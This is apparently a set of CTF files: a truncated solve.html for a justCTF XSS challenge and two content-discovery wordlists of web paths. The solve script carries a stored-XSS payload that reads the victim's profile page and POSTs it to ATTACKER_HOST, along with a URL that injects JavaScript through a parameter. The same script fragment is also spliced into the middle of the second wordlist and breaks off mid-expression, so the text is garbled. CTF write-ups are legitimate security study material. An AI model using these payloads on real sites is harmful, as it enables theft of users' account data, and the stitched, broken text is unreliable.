Grzegorz Niedziela gregxsunday

## solve.html
<script>
	const samesiteXSS =
		'http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(name);`'

	// prepare an account with the following xss payload as description
	// <svg><textarea></svg><script>fetch('/profile%2fedit').then(r=>r.text()).then(t=>fetch('https://ATTACKER_HOST/report',{method:'POST',body:t,mode:'no-cors'}))< /script>
	// the `%2f` in `/profile%2fedit` is needed or browser will use our provided XSS account session to request it, which doesn't have the flag
	// playing with window/iframe references should work too
	window.name =
		'javascript:' +

## content_discovery_nullenc0de.txt
/
$$$lang-translate.service.js.aspx
$367-Million-Merger-Blocked.html
$defaultnav
${idfwbonavigation}.xml
$_news.php
$search2
£º
.0
/0

## content_discovery_all.txt
`
~/
~
×™×


___
__
_
	<script>
	const samesiteXSS =
	'http://xssl.web.jctf.pro/?text=a&unmodifiable[CSP]=a&unmodifiable[background]=`;location.assign(name);`'

	// prepare an account with the following xss payload as description
	// <svg><textarea></svg><script>fetch('/profile%2fedit').then(r=>r.text()).then(t=>fetch('https://ATTACKER_HOST/report',{method:'POST',body:t,mode:'no-cors'}))< /script>
	// the `%2f` in `/profile%2fedit` is needed or browser will use our provided XSS account session to request it, which doesn't have the flag
	// playing with window/iframe references should work too
	window.name =
	'javascript:' +
	/
	$$$lang-translate.service.js.aspx
	$367-Million-Merger-Blocked.html
	$defaultnav
	${idfwbonavigation}.xml
	$_news.php
	$search2
	£º
	.0
	/0